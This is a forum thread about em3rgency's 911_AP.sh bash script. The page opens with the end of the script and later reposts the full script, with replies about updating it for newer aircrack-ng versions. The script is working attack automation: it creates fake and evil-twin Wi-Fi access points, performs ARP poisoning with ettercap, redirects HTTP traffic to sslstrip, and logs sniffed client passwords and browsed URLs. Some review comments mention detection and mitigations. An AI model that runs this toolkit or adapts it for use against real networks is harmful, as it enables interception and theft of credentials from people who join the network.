echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
# Any input ends the session; the value itself is not used.
read ENTERKEY

# Teardown by process name.
# NOTE(review): killall xterm also closes xterm windows that have nothing to do
# with this script.
killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
# NOTE(review): removes every rule and user-defined chain in the filter and nat
# tables, not just the single REDIRECT added above; pre-existing host firewall
# rules are lost and have to be reloaded by hand.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "4" ]; then
# ARP submenu option 4: single-host session on the wireless interface ($WIFACE).
echo ""
echo ""
echo $BLUE"This should be your Gateway from what I see: "
echo ""
# Print the routes flagged UG so the gateway address can be read off the screen.
route -n -A inet | grep UG
echo ""
echo ""
# NOTE(review): neither address is validated; both are expanded unquoted into
# the ettercap targets below.
echo $STAND"Please type the IP of your gateway: "
read GATEWAY4
echo ""
echo "Please type the IP of the target host: "
read HOST4
echo ""
echo $BLUE"                     Starting Attack on Target Host"
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3

# Enable routing on this host; the previous value is not recorded.
echo "1" > /proc/sys/net/ipv4/ip_forward

# URLsnarf. xterm's -l/-lf options log the window output to a timestamped file
# under /root/$SESSION. No PID is kept for any window in this branch.
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $WIFACE &
sleep 2

# Port redirection: only TCP port 80 goes to local port 10000; traffic that
# starts on 443 is untouched.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Ettercap in ARP mode between the typed gateway and the typed host.
# Detection side: this shows up as unsolicited ARP replies re-mapping the
# gateway address, which ARP monitoring or switch-level ARP inspection flags.
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $WIFACE -M arp:remote /$GATEWAY4/ /$HOST4/ &
sleep 2

# SSLstrip
# NOTE(review): no explicit listen-port option is passed; the trailing 10000
# follows -k. Confirm the tool really listens on the port the REDIRECT targets.
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# Follow sslstrip.log. NOTE(review): relative path, resolved against the
# directory the script was started from.
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log  -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
# Any input ends the session; the value itself is not used.
read ENTERKEY

# Teardown by process name.
# NOTE(review): killall xterm also closes xterm windows that have nothing to do
# with this script.
killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
# NOTE(review): removes every rule and user-defined chain in the filter and nat
# tables, not just the single REDIRECT added above; pre-existing host firewall
# rules are lost and have to be reloaded by hand.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
clear

# NOTE(review): these lines sit inside the option-4 branch, with no else before
# them, so the "Invalid option" message and a second relaunch run after every
# option-4 session. A selection that matches none of 1-5 reaches no branch at
# all and prints nothing.
echo $RED"                Invalid option, you must choose 1,2,3,4 or 5.."
sleep 2
echo $BLUE"                          Re-Launching Script..."
./911_AP.sh

fi
fi
fi
fi
# ARP submenu option 5 ("Return to Main Menu"): relaunch the script. By this
# point $menuoption holds the ARP submenu answer, not the main-menu one.
# NOTE(review): $menuoption is unquoted, so an empty answer makes the test
# itself fail with a syntax error instead of simply comparing as false.
if [ $menuoption = "5" ]; then
./911_AP.sh
fi
else

# A script to quickly tell whose on your network in real time.
if [ $menuoption = "5" ]; then
# Option 5: ask for an interface and the gateway address, then run netdiscover
# over the gateway's /24 in a foreground xterm.
clear
printf '%s\n' \
  "${BLUE}           This will show all The clients connected to The network" \
  ""
sleep 3
clear
printf '\n\n'
printf '%s\n' "${STAND}Please type the name of your network interface Example: eth0 "
read IFACE
printf '\n\n'
printf '%s\n' "               This should be your gateway from what I see: "
# Routes flagged UG, so the gateway address can be read off the screen.
route -n -A inet | grep UG
sleep 1
printf '\n\n'
printf '%s\n' "${STAND}Please type in the IP address of your gateway"
read GATEWAY
sleep 2
clear
printf '\n\n\n'
printf '%s\n' \
  "${BLUE}                   Press CTRL C to stop close netdiscover" \
  "" \
  "" \
  "${RED}    ####################################################################" \
  "${RED}    [           em3rgency's Netdiscover script is now running          ]" \
  "${RED}    [                                                                  ]" \
  "${RED}    [                Press ENTER return to the Main Menu               ]" \
  "${RED}    [                                                                  ]" \
  "${RED}    [             IF not closed properly ERRORS WILL OCCUR             ]" \
  "${RED}    ####################################################################"

# The xterm is not backgrounded, so the script waits here until that window is
# closed. Both answers are passed unquoted, exactly as typed.
sudo xterm -bg blue -fg white -e netdiscover -i $IFACE -r $GATEWAY/24
# Wait for ENTER, then hand control back to a fresh copy of the menu.
read ENTERKEY
clear
./911_AP.sh

else
if [ $menuoption = "6" ]; then
exit
fi
fi
fi
fi
fi
fi

Offline TAPE

Re: em3rgency 911_AP Script
« Reply #1 on: May 28, 2015, 02:35:50 PM »
Hey dude,


With the new aircrack, you may want to look at the way the monitor interfaces are called as the interface names are now different in the new aircrack..


So wlan2 will not become mon0, but wlan2mon.


Nonetheless, I would fully support a rewritten fakeAP / easycreds script..




edit
-----
Also think some functions may need to be revisited..;
Code: [Select]
#This command will update aircrack-ng to the latest nightly build
if [ $menuoption = "7" ]; then
sudo airodump-ng-oui-update
This does not update aircrack, but updates the oui list (list of MAC vendors/MACs)
http://standards-oui.ieee.org/oui.txt
« Last Edit: May 28, 2015, 02:44:13 PM by TAPE »
Take all the advice you like and then tell everyone to **** off and do your own thing -- Gitsnik

Offline 0E 800

Re: em3rgency 911_AP Script
« Reply #2 on: May 28, 2015, 02:43:36 PM »
Maybe you bash and python pros can create a simple script that goes something like:

If aircrack = version x.x.x that uses mon0
Then = make script use mon0
If aircrack = version 1x.x.x.x that uses wlan0mon
Then = make script use wlan0mon

Er something like that.. maybe we could just paste that in any script and it will overwrite?
"He who passes not his days in the realm of dreams is the slave of the days."

Offline TAPE

Re: em3rgency 911_AP Script
« Reply #3 on: May 28, 2015, 02:53:01 PM »
Well it would be easy to do a
Code: [Select]
'create monitor interface MON_IFACE'
sed "s/mon0/$MON_IFACE/g"


but not sure whether that would solve all.. :)


Some things just need re-writing..
Take all the advice you like and then tell everyone to **** off and do your own thing -- Gitsnik

satix

  • Guest
Re: em3rgency 911_AP Script
« Reply #4 on: May 29, 2015, 08:13:41 AM »
So who would like to work on this and get something really useful for our community?

Offline TAPE

Re: em3rgency 911_AP Script
« Reply #5 on: May 29, 2015, 10:44:45 AM »
Well I toyed with the same idea  a few months ago, but got sidetracked by ..well..life :)


It could be interesting to look at a rewrite.


I came across a Python script which may also be interesting to look at; I haven't tested it.


http://sign0f4.blogspot.jp/2014/07/introducing-mitmf-framework-for-man-in.html

Take all the advice you like and then tell everyone to **** off and do your own thing -- Gitsnik

Offline GalaxyNinja

Re: em3rgency 911_AP Script
« Reply #6 on: May 29, 2015, 11:47:44 AM »
So who would like to work on this and get something really useful for our community?

satix, from the first post it looked like you were working on it and just looking for support and feedback?

satix

  • Guest
Re: em3rgency 911_AP Script
« Reply #7 on: May 29, 2015, 02:14:37 PM »
I was working on it a bit, I will post more updates. Perhaps others can work on it as well and together, we can come up with a "final version" that all can benefit from.


Offline c0ldg0ld

Re: em3rgency 911_AP Script
« Reply #8 on: June 01, 2015, 10:19:05 AM »
Didn't Crypiehef already re-work this script to bring it "up to date" recently?
rm -rf /bin/laden

Time is an illusion. Lunchtime doubly so.


Public Key

ch3rn0byl

  • Guest
Re: em3rgency 911_AP Script
« Reply #9 on: June 01, 2015, 11:02:57 AM »
Didn't Crypiehef already re-work this script to bring it "up to date" recently?
Yep.

satix

  • Guest
Re: em3rgency 911_AP Script
« Reply #10 on: June 02, 2015, 09:53:23 AM »
Link?

Offline GalaxyNinja

  • Global Moderator
  • Elite
  • *****
  • Posts: 1713
  • Internets: +95/-0
  • My password is **********

Offline cg

Re: em3rgency 911_AP Script
« Reply #12 on: June 02, 2015, 04:39:30 PM »
http://forum.top-hat-sec.com/index.php?topic=5239.msg43237

His website is down. If anyone has the script, please post it here. Thanks!

Offline 0E 800

Re: em3rgency 911_AP Script
« Reply #13 on: June 02, 2015, 05:02:00 PM »
https://github.com/crypiehef/911_AP.sh



You wanna know how I found it?

I pasted the link that was no longer available into the google search bar.

Then I accessed the cached link. The cached link had the git-hub address.

Heres another cool trick: I am going to paste the code here too, you know, just in case it goes missing from git-hub  8)

Code: [Select]
#!/bin/bash
# updated mar 4th 2015
# script coded by em3rgency
# script updated by crypiehef to work with Kali Linux
# 911_AP version 1.1 (kali)
# xwininfo -id $(xprop -root | awk '/_NET_ACTIVE_WINDOW\(WINDOW\)/{print $NF}')
# This script creates a FAKE Access Points and loads the tools to enumerate connected clients. And it actually works!
# Also includes workin ARP poisoning features.
# Tested and working on kali Linux, Needs to have version 1.3 of dhcp3-server to work correctly
# Works with ISC DHCP Server now. Readme needs to be updated with ISC config instructions.

# Terminal colour codes used by every banner and menu below.
# Each variable holds whatever tput prints for the current terminal, so it is
# empty when tput cannot resolve the terminal type.
bold_colour() {
  # $1 - colour number passed to "tput setaf"; bold is added only if that works.
  tput setaf "$1" && tput bold
}
STAND="$(tput sgr0)"
RED="$(bold_colour 1)"
GREEN="$(bold_colour 2)"
BLUE="$(bold_colour 6)"

# Splash screen: three blank lines, the boxed title in red, the update URL in
# blue, then a three-second pause before the terminal is cleared.
printf '\n\n\n'
splash_rows=(
  "              +############################################+"
  "              +    em3rgency's Fake AP SSL MITM script     +"
  "              +                                            +"
  "              +                Version 1.1                 +"
  "              +                                            +"
  "              +           www.em3rgency.com                +"
  "              +############################################+"
)
for splash_row in "${splash_rows[@]}"; do
  printf '%s\n' "${RED}${splash_row}"
done
printf '\n'
printf '%s\n' "${BLUE}     Visit http://www.em3rgency.com for updates to this script. Thanks"
printf '\n\n'
sleep 3
clear

# Main menu: title in blue, the six numbered entries boxed in red, then the
# prompt. The answer is stored in menuoption and drives the if/else chain
# that follows.
printf '%s\n' "${BLUE}                    em3rgency's MITM script Version 1.1 !"
printf '\n'
main_menu_rows=(
  "              ************************************************"
  "              *    1.  Prerequsites and Updates              *"
  "              *    2.  Run FAKE AP Static                    *"
  "              *    3.  Run EVIL TWIN AP                      *"
  "              *    4.  Run Standard ARP poison               *"
  "              *    5.  Netdiscover connected clients         *"
  "              *    6.  EXIT                                  *"
  "              ************************************************"
)
for main_menu_row in "${main_menu_rows[@]}"; do
  printf '%s\n' "${RED}${main_menu_row}"
done
printf '\n'

printf '%s\n' "${BLUE}                          Select Menu Option:"
read menuoption
if [ $menuoption = "1" ]; then
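clear
echo ""
# Prerequisites submenu. The labels are printed exactly as before.
prereq_rows=(
  "                   **************************************"
  "                   *    1.  Run apt-get update          *"
  "                   *    2.  Run apt-get upgrade         *"
  "                   *    3.  Distribution upgrade        *"
  "                   *    4.  Edit etter.conf             *"
  "                   *    5.  Edit DHCP tunnel interface  *"
  "                   *    6.  Install Dhcp3-server        *"
  "                   *    7.  Update aircrack-ng          *"
  "                   *    8.  Return to Main Menu         *"
  "                   **************************************"
)
for prereq_row in "${prereq_rows[@]}"; do
  printf '%s\n' "${RED}${prereq_row}"
done

printf '%s\n' "${BLUE}                           Select Menu Option:${STAND}"
# -r keeps backslashes literal. The answer overwrites the main-menu choice in
# menuoption, as it did before; it is only compared, never executed.
read -r menuoption

# One case statement replaces the eight-deep if/else ladder. Quoting the
# selector means an empty answer no longer makes every test fail with
# "[: =: unary operator expected".
# "./911_AP.sh" starts a child copy of the script from the current directory;
# when that child ends, this copy continues to the end of the file.
case "$menuoption" in
  1)
    # Refresh the package index (this does not upgrade anything by itself).
    sudo apt-get update
    clear
    ./911_AP.sh
    ;;
  2)
    # Upgrade the installed packages.
    sudo apt-get upgrade
    clear
    ./911_AP.sh
    ;;
  3)
    # Distribution upgrade.
    sudo apt-get dist-upgrade
    clear
    ./911_AP.sh
    ;;
  4)
    # Open etter.conf in nano.
    nano /etc/etter.conf
    clear
    ./911_AP.sh
    ;;
  5)
    # Open the isc-dhcp-server defaults file, where the served interface is set.
    nano /etc/default/isc-dhcp-server
    clear
    ./911_AP.sh
    ;;
  6)
    # Install the DHCP server package.
    # NOTE(review): unlike the other package commands this one has no sudo, and
    # the package name dhcp3-server does not match the isc-dhcp-server file
    # edited by option 5 - confirm which package the distribution ships.
    apt-get install dhcp3-server
    clear
    ./911_AP.sh
    ;;
  7)
    # NOTE(review): the menu calls this "Update aircrack-ng"; the command run
    # is airodump-ng-oui-update, which presumably refreshes the OUI list only -
    # confirm. As before, this option does not relaunch the menu.
    sudo airodump-ng-oui-update
    clear
    ;;
  8)
    ./911_AP.sh
    ;;
  *)
    printf '%s\n' "Invalid option, you must choose 1-8." >&2
    ;;
esac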
else

if [ $menuoption = "2" ]; then
# Main-menu option 2: static fake access point.
# This part only collects the operator's answers, creates the log folder and
# switches the chosen wireless interface to monitor mode.
sleep 2

# Configuring your Network interfaces
# The default-route line(s) (flag UG) are printed so the gateway can be read
# off. None of the five answers below is validated, and all of them are later
# expanded unquoted in commands; the script writes to /root and /proc/sys, so
# it is presumably run as root.
echo
echo $BLUE"                   [+] Lets get started shall we [+]"
echo $STAND""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo "Enter the gateway IP address, Shown above. Example 192.168.1.1: "
read -e gatewayip
clear
echo -n "Enter your interface that is connected to the internet, Example eth0: "
read -e internet_interface
clear
echo -n "Enter your interface to be used for the fake AP, Example wlan1: "
read -e fakeap_interface
clear
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
clear
echo -n "Name the folder you want to save your logs into "
read -e SESSION
# Creates the session directory under /root.
# NOTE(review): $SESSION is unquoted and unchecked, so a name with spaces is
# split into several paths and "../" segments place the folder outside /root.
mkdir -p /root/$SESSION
clear

# Monitor mode. The original interface name is kept in $fakeap for teardown;
# from here on fakeap_interface is the hard-coded name "mon0".
echo $BLUE"              Starting Airmon-ng and creating mon0 interface...."$STAND
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"
sleep 2
clear

echo $RED"          [##########################################################]"
echo $RED"  [+][+][+]              Running MITM attack vectors                 [+][+][+]"
echo $RED"          [##########################################################]"
sleep 5
echo ""

# Dhcpd directory and dhcpd.conf creation
# The generated config hands out 10.0.0.30-10.0.0.60 with router and DNS both
# set to 10.0.0.1 and the domain name set to the ESSID. For a defender those
# lease values are what a client on this network would show.
# NOTE(review): $ESSID sits between two quoted pieces and is itself unquoted,
# so repeated spaces collapse, and a '"' or ';' in the name changes the
# structure of the config file that dhcpd is then started with.
mkdir -p "/var/run/dhcpd"
echo "authoritative;
default-lease-time 700;
max-lease-time 8000;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;
range 10.0.0.30 10.0.0.60;
}" > /var/run/dhcpd/dhcpd.conf

# FAKEAP setup
# airbase-ng runs inside a background xterm on channel 1 with the chosen ESSID;
# the xterm's PID is saved in fakeapid for the teardown.
echo $BLUE"             Configuring and Starting your FAKE Access Point...."
xterm -bg blue -fg white -geometry 100x7+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 3
echo ""

# Setup your IP Tables
# at0 (presumably the tap interface airbase-ng creates - confirm) becomes the
# 10.0.0.1 gateway of the subnet served above.
echo $BLUE"                     Configuring your IP tables...."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
# NOTE(review): these four commands delete every rule and user chain in the
# filter and nat tables of the host running the script. Nothing is saved
# first, so an existing host firewall is gone from this point on.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
# Turns the host into a router: forwarding on, FORWARD policy ACCEPT.
echo 1 > /proc/sys/net/ipv4/ip_forward
# Every UDP packet reaching PREROUTING, whatever its port, is re-addressed to
# the gateway IP typed in earlier.
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
# Only tcp/80 is diverted to local port 10000. Connections that start on 443
# are not touched by this rule, which is why HSTS preloading and HTTPS-only
# client settings are the relevant client-side mitigations.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo ""

#  DHCP
# Creates a root-owned PID file, then runs dhcpd in the foreground of its own
# xterm with the config written above, on at0. PID of the xterm -> dhcpid.
echo $BLUE"              Setting up DHCP to work with $ESSID...."
touch /var/run/dhcpd.pid
chown root:root /var/run/dhcpd.pid
xterm -bg blue -fg white -geometry 80x7-0+25 -T DHCP -e dhcpd -d -f -cf "/var/run/dhcpd/dhcpd.conf" at0 & dhcpid=$!
sleep 3
echo ""

# SSLstrip
# Port 10000 is the local port the tcp/80 REDIRECT rule points at.
# $! after "sudo xterm ... &" is the PID of the backgrounded sudo process.
echo $BLUE"            Starting SSLstrip to enumerate user credentials...."
sudo xterm  -bg blue -fg white -geometry 80x7-0+193 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2
echo ""

# Ettercap
# "xterm -l -lf FILE" logs everything shown in the window to FILE under
# /root/$SESSION. By the script's own wording this output contains client
# passwords, so the session folder holds captured credentials in plain text
# and has to be stored and deleted accordingly.
echo $BLUE"               Starting Ettercap to sniff client passwords...."
xterm -bg blue -fg white -geometry 80x7-0+366 -T ettercap -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -p -u -T -q -i at0 & ettercapid=$!
sleep 3
echo ""

# URLSnarf
# Listens on the internet-facing interface, not at0; the window is logged to
# the session folder as well.
echo $BLUE"          Starting URLSnarf to show the websites the victim browses...."
xterm -bg blue -fg white -geometry 80x7-0+539 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $internet_interface & urlsnarfid=$!
sleep 3
clear

# Follows sslstrip.log with tail -f. The path is relative, so the file is
# looked up in whatever directory the script was started from.
xterm -bg blue -fg white -geometry 80x7-0-25 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo $RED"    ####################################################################"
echo $RED"    [        em3rgency's Fake AP SSL MITM attack is now running...     ]"
echo $RED"    [                                                                  ]"
echo $RED"    [     Press Y then ENTERKEY to close kill and clean up the script  ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
echo ""
echo ""
# The answer decides whether the teardown that follows runs.
# NOTE(review): the banner says "Y" but the check that follows compares
# against lowercase "y" only.
read WISH

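# Kill all
# Teardown for the static fake AP branch. The banner asks for "Y", so either
# case is accepted; with the old lowercase-only test a capital Y skipped the
# teardown and left forwarding, the NAT rules and every tool window running.
# Quoting the selector also keeps an empty answer from breaking the test.
# Any other answer falls through to the relaunch at the bottom, as before.
case "$WISH" in
  y | Y)
    echo
    echo "${BLUE}                           Cleaning up your mess${STAND}"
    echo ''
    sleep 2

    # Signal the background jobs whose PIDs were saved when they were started.
    # dritnetid is never assigned anywhere in this script, so empty entries
    # are skipped instead of calling kill without a PID.
    for tool_pid in "$fakeapid" "$dhcpid" "$sslstripid" "$ettercapid" \
      "$urlsnarfid" "$dritnetid" "$sslstriplogid"; do
      if [ -n "$tool_pid" ]; then
        kill "$tool_pid"
      fi
    done

    # Leave monitor mode on the monitor interface and on the original one.
    airmon-ng stop "$fakeap_interface"
    airmon-ng stop "$fakeap"
    # NOTE(review): forwarding is forced to 0 and all filter/nat rules and
    # user chains are deleted; nothing is restored to what the host had
    # before the run, and the FORWARD policy set to ACCEPT earlier is not
    # reset. The host firewall has to be re-applied by hand afterwards.
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    clear
    echo ""
    echo ""
    echo "${RED}             [+][+][+]     Everything is now cleaned up    [+][+][+]"
    echo "${RED}             [+][+][+]Please visit http://www.em3rgency.com[+][+][+]"
    echo "${RED}             [+][+][+]          Coded by em3rgency         [+][+][+]"
    sleep 5
    exit
    ;;
esac

sleep 3
clear

# Relaunch the menu as a child process from the current directory.
./911_AP.sh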
else

# This command will RUN The EVIL TWIN AP attack
if [ $menuoption = "3" ]; then
# Main-menu option 3 (evil twin AP), first part: collect the operator's
# answers, create the log folder, switch the wireless interface to monitor
# mode. Same prompts as the static branch.
sleep 3

# Configuring your Network interfaces
# None of the answers is validated; all are expanded unquoted later on.
echo
echo $BLUE"                       [+] Lets get started shall we [+]"$STAND
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo ""
echo "Enter the gateway IP address, Shown above. Example 192.168.1.1: "
read -e gatewayip
clear
echo -n "Enter your interface that is connected to the internet, Example eth0: "
read -e internet_interface
clear
echo -n "Enter your interface to be used for the fake AP, Example wlan1: "
read -e fakeap_interface
clear
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
clear
echo -n "Name the folder you want to save your logs into "
read -e SESSION
clear
# NOTE(review): $SESSION is unquoted and unchecked, so spaces split it into
# several paths and "../" segments place the folder outside /root.
mkdir -p /root/$SESSION
clear

# The original interface name is kept in $fakeap for teardown; afterwards
# fakeap_interface is the hard-coded name "mon0".
echo $BLUE"               Starting Airmon-ng and creating mon0 interface...."$STAND
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"
sleep 2
clear

echo $RED"          [##########################################################]"
echo $RED"  [+][+][+]              Running MITM attack vectors                 [+][+][+]"
echo $RED"          [##########################################################]"
sleep 5
echo ""

# Dhcpd directory and dhcpd.conf creation
# Leases come from 10.0.0.30-10.0.0.60 with router and DNS both 10.0.0.1 and
# the domain name set to the ESSID; those values are what a client on this
# network would show.
# NOTE(review): $ESSID is unquoted between the two quoted pieces, so a '"' or
# ';' in the name changes the structure of the generated config.
mkdir -p "/var/run/dhcpd"
echo "authoritative;
default-lease-time 700;
max-lease-time 8000;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;
range 10.0.0.30 10.0.0.60;
}" > /var/run/dhcpd/dhcpd.conf

# FAKEAP setup
# The only difference from the static branch is "-P -C 60": the AP also
# answers probe requests for other network names. Clients that auto-join
# remembered open networks are the exposed ones; removing saved open networks
# or disabling auto-join is the client-side mitigation.
echo $BLUE"                     Configuring and Starting $ESSID...."
xterm -bg blue -fg white -geometry 100x7+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -P -C 60 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 3
echo ""

# Setup your IP Tables
# at0 (presumably the tap interface airbase-ng creates - confirm) becomes the
# 10.0.0.1 gateway of the subnet served above.
echo "                          Configuring your IP tables...."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
# NOTE(review): deletes every filter and nat rule and user chain on the host
# without saving them; an existing host firewall is gone from here on.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
# Forwarding on, FORWARD policy ACCEPT, all UDP re-addressed to the gateway IP,
# outbound traffic masqueraded on the internet-facing interface.
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
# Only tcp/80 is diverted to local port 10000; traffic that starts on 443 is
# not touched by this rule (hence HSTS / HTTPS-only as mitigations).
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo ""

#  DHCP
# Root-owned PID file, then dhcpd in the foreground of its own xterm on at0.
echo "                   Setting up DHCP to work with EVIL TWIN AP...."
touch /var/run/dhcpd.pid
chown root:root /var/run/dhcpd.pid
xterm -bg blue -fg white -geometry 80x7-0+25 -T DHCP -e dhcpd -d -f -cf "/var/run/dhcpd/dhcpd.conf" at0 & dhcpid=$!
sleep 3
echo ""

# SSLstrip
# Port 10000 is the local port the tcp/80 REDIRECT rule points at.
# $! after "sudo xterm ... &" is the PID of the backgrounded sudo process.
echo "               Starting SSLstrip to enumerate user credentials...."
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2
echo ""

# Ettercap
# The window is logged (xterm -l -lf) to /root/$SESSION. By the script's own
# wording this output contains client passwords, so the session folder holds
# captured credentials in plain text.
echo "                 Starting Ettercap to sniff client passwords...."
xterm -bg blue -fg white -geometry 80x7-0+366 -T ettercap -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -p -u -T -q -i at0 & ettercapid=$!
sleep 3
echo ""

# URLSnarf
# Listens on the internet-facing interface; logged to the session folder too.
echo "            Starting URLSnarf to show the websites the victim browses...."
xterm -bg blue -fg white -geometry 80x7-0+539 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $internet_interface & urlsnarfid=$!
sleep 3
clear

# Follows sslstrip.log with tail -f; the path is relative to the directory the
# script was started from.
xterm -bg blue -fg white -geometry 80x7-0-25 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo $RED"     ####################################################################"
echo $RED"     [        em3rgency's Fake AP SSL MITM attack is now running...     ]"
echo $RED"     [                                                                  ]"
echo $RED"     [    Press Y then ENTERKEY to close kill and clean up the script   ]"
echo $RED"     [                                                                  ]"
echo $RED"     [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"     ####################################################################"
echo $STAND""
echo ""
# NOTE(review): the banner says "Y" but the check that follows compares
# against lowercase "y" only.
read WISH

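# Kill all
# Teardown for the evil twin branch. The banner asks for "Y", so either case
# is accepted; with the old lowercase-only test a capital Y skipped the
# teardown and left forwarding, the NAT rules and every tool window running.
# Quoting the selector also keeps an empty answer from breaking the test.
# Unlike the static branch this one does not exit after cleaning up; it
# continues to the relaunch at the bottom, as before.
case "$WISH" in
  y | Y)
    echo
    echo "${BLUE}                           Cleaning up your mess"
    echo ''
    sleep 2

    # Signal the background jobs whose PIDs were saved when they were started.
    # dritnetid is never assigned anywhere in this script, so empty entries
    # are skipped instead of calling kill without a PID.
    for tool_pid in "$fakeapid" "$dhcpid" "$sslstripid" "$ettercapid" \
      "$urlsnarfid" "$dritnetid" "$sslstriplogid"; do
      if [ -n "$tool_pid" ]; then
        kill "$tool_pid"
      fi
    done

    # Leave monitor mode on the monitor interface and on the original one.
    airmon-ng stop "$fakeap_interface"
    airmon-ng stop "$fakeap"
    # NOTE(review): forwarding is forced to 0 and all filter/nat rules and
    # user chains are deleted; nothing is restored to what the host had
    # before the run, and the FORWARD policy set to ACCEPT earlier is not
    # reset. The host firewall has to be re-applied by hand afterwards.
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    clear
    echo ""
    echo ""
    echo "${RED}             [+][+][+]     Everything is now cleaned up    [+][+][+]"
    echo "${RED}             [+][+][+]Please visit http://www.em3rgency.com[+][+][+]"
    echo "${RED}             [+][+][+]          Coded by em3rgency         [+][+][+]${STAND}"
    sleep 5
    ;;
esac

sleep 3
clear
# Relaunch the menu as a child process from the current directory.
./911_AP.sh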
else

# Credits to N1t0g3n for the base to this section. Thanks bro
if [ $menuoption = "4" ]; then
# Main-menu option 4, first part: list the interface names (everything except
# names containing "lo" or "vm"), ask for the wireless and wired interface and
# the log folder, then show the ARP submenu. The submenu answer overwrites
# menuoption.
clear
printf '\n\n'
printf '%s\n' "${BLUE}                  Finding wireless and ethernet interfaces.${STAND}"
sleep 3
printf '\n'
ifconfig -a | cut -d " " -f1 | sed '/^$/d' | egrep -v 'lo|vm'
printf '\n\n'
printf '%s\n' "Please type the name of your wireless interface (wlan0): "
read WIFACE
sleep 2
printf '\n\n'
printf '%s\n' "Please type the name of your ethernet interface (eth0): "
read ETH0
clear
printf '%s' "Name the folder you want to save your logs into "
read -e SESSION

# Left unquoted so the folder name is split exactly as before.
mkdir -p /root/$SESSION
clear
printf '\n\n'
clear
arp_menu_rows=(
  "              **************************************************"
